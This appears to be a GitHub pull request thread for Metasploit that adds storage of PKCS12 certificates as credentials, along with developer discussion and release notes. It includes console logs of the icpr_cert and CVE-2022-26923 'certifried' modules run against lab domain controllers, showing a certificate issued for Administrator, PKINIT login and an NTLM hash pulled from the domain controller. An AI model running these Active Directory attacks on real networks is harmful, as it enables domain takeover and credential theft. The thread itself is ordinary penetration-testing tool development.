Persist icpr cert as pkcs12 credential

[adfoster-r7]

Add support for persisting pkcs12 credentials in Metasploit. Updates the admin/dcerpc/icpr_cert module to persist requested certificates.

Depends on rapid7/metasploit-credential#169

Example:

msf6 auxiliary(admin/dcerpc/icpr_cert) > rerun smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ca=adf3-DC3-CA cert_template=ESC1-Test smbdomain=ADF3.LOCAL alt_upn=Administrator@adf3.local
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:445 - Requesting a certificate...
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate UPN: Administrator@adf3.local
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20221209012934_default_unknown_windows.ad.cs_070132.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > creds
Credentials
===========

host            origin          service        public                    private                                                              realm  private_type  JtR Format
----            ------          -------        ------                    -------                                                              -----  ------------  ----------
192.168.123.13  192.168.123.13  445/tcp (smb)  Administrator@adf3.local  subject: /CN=Administrator,issuer: /DC=local/DC=adf3/CN=adf3-DC3-CA         Pkcs12 (pfx)  

The pfx base64 blob is output with creds -v or creds -o foo.txt after #17355 is merged

Verification

• Ensure the database is connect
• Ensure bundle exec rails db:migrate has been run
• Verify the certifried exploit module works and that the creds command shows the pfx as expected
• Verify the admin/dcerpc/icpr_cert request works - using the steps from Update icpr_cert for requesting certs on behalf of users #17240 and verify that the output of the creds command
• Verify the steps in Add pkcs12 private data type metasploit-credential#169

[adfoster-r7]

This will most likely land into master after the kerberos branch is merged, taking off the feature label for now 👍

[dwelch-r7]

I'm running into an error here:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.176.3

[+] [2023.04.12-11:44:19] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully created windomain.local\DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:22] 192.168.176.3:445 -   Password: mb4WQRCUxMUP5Uz1Yuhl2YZVQa3tazYf
[+] [2023.04.12-11:44:22] 192.168.176.3:445 -   SID:      S-1-5-21-2380665626-1154582258-49301182-1149
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[*] [2023.04.12-11:44:22] 192.168.176.3:445 - Attempting to set the DNS hostname for the computer DESKTOP-EPLXTSOP$ to the DNS hostname for the DC: dc2019
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully changed the DNS hostname
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - The requested certificate was issued.
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate SID: S-1-5-21-2380665626-1154582258-49301182-1149
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate stored at: /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_windows.ad.cs_298084.pfx
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Attempting PKINIT login for dc2019$@windomain.local
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Successfully authenticated with certificate
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGT MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_288354.bin
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Trying to retrieve NT hash for dc2019$
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:88 - Received a valid TGS-Response
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGS MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_236126.bin
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Found NTLM hash for dc2019$: aad3b435b51404eeaad3b435b51404ee:ab60af0d9ee0336f8cc7df44c9f7caed
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Deleting the computer account DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:25] 192.168.176.3:445 - The specified computer has been deleted.
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Call stack:
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:425:in `report_ntlm'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:421:in `get_ntlm_hash'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:124:in `run'
[*] Auxiliary module execution completed

metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb

Line 425 in 2d30909

jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)

FWIW though it did correctly add the PFX to the database

[adfoster-r7]

I'm running into an error here:
...
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes

Looks like a regression from #17784 - will put up a separate PR to fix

[dwelch-r7]

Tested all the scenarios works well for me

[dwelch-r7]

Release Notes

Adds support for persisting pkcs12 credentials in Metasploit, i.e. .pfx/.p12 files. The the auxiliary/admin/dcerpc/icpr_cert and auxiliary/admin/dcerpc/cve_2022_26923_certifried modules will now persist requested certificates for future exploitation. The creds command can also directly persist certificates - for example: creds add user:alice pkcs12:/path/to/certificate.pfx